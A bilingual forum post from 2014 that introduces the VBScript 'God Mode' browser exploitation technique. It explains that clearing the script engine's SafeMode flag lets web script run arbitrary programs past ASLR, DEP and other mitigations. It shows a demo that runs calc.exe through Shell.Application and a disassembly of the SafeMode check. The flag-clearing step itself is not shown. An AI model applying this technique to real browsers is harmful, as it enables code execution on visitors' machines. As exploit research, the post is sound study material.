-
-
[原创]How to use VBScript to turn on the God Mode?
-
发表于: 2014-6-19 19:11
-
关于Yuange vbscript safemode 介绍及debug :)
牛人可以主动忽略了。
How to use VBScript to turn on the God Mode?
怎么用VB开启仙人模式。。。
What is the God Mode?
什么是神模式?
This concept is came from yuange, it means if we turn on this God Mode, we can do anything we what.
这个概念源于yuange,神模式的意思就是如果我们能开启神模式,我们可以做我们想做的任何事,譬如隐身进女澡堂。
And What the God Mode really is?
那么到底什么是神模式?
We know if we want to execute the script code in the browser to create a object like Shell.Application, the script
engine will check the SafeMode. if this is set, it will block the code. That is the God Mode. Yuange also call this is
DVE(Data Virtual Execution), This is just execute the script, not the binary code. So the ASLR,DEP,EMET,CFI all of
the defense technology will be fail.
我们的目的是在浏览器里通过执行脚本创建一个shell之类的东西。脚本引擎就会对SafeMode(安全模式)进行检查。如果浏览器设置
了安全模式,我们的脚本就不会被执行。这就是神模式的本质。袁哥(一个很厉害的黑客)也把这个叫做DVE(数据虚拟执行),这仅仅只是执行脚本而不是
二进制代码,所以什么ASLR(Address Space Layout Randomization,地址空间随机化),DEP(Data Execution Prevention,数据执行保护),EMET(Enhanced Mitigation Experience Toolkit,增强的缓解体验工具包),CFI(Control-Flow Integrity),所有的这些保护都不是事儿。
What we are going to do is to clear the SafeMode flag.
(Notice: All the following code is vbscript code.)
I will show a demo code first.
我们接下来要做的工作就是去掉SafeMode(下面的代码都是VB脚本,我先做个演示)
"
<script type="text/javascript" language="VBScript">
set sh=createobject("Shell.Application")
sh.ShellExecute "calc.exe"
</script>
"
.text:7327624B ; int __thiscall COleScript::InSafeMode(COleScript *__hidden this) .text:7327624B ?InSafeMode@COleScript@@QAEHXZ proc near .text:7327624B ; CODE XREF: VbsGetObject2(VAR *,int,VAR *)+8Ap .text:7327624B ; sub_73282607+1Bp ... .text:7327624B mov eax, [ecx+174h] .text:73276251 and eax, 0Bh .text:73276254 neg al .text:73276256 sbb eax, eax .text:73276258 neg eax .text:7327625A retn .text:7327625A ?InSafeMode@COleScript@@QAEHXZ endp
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
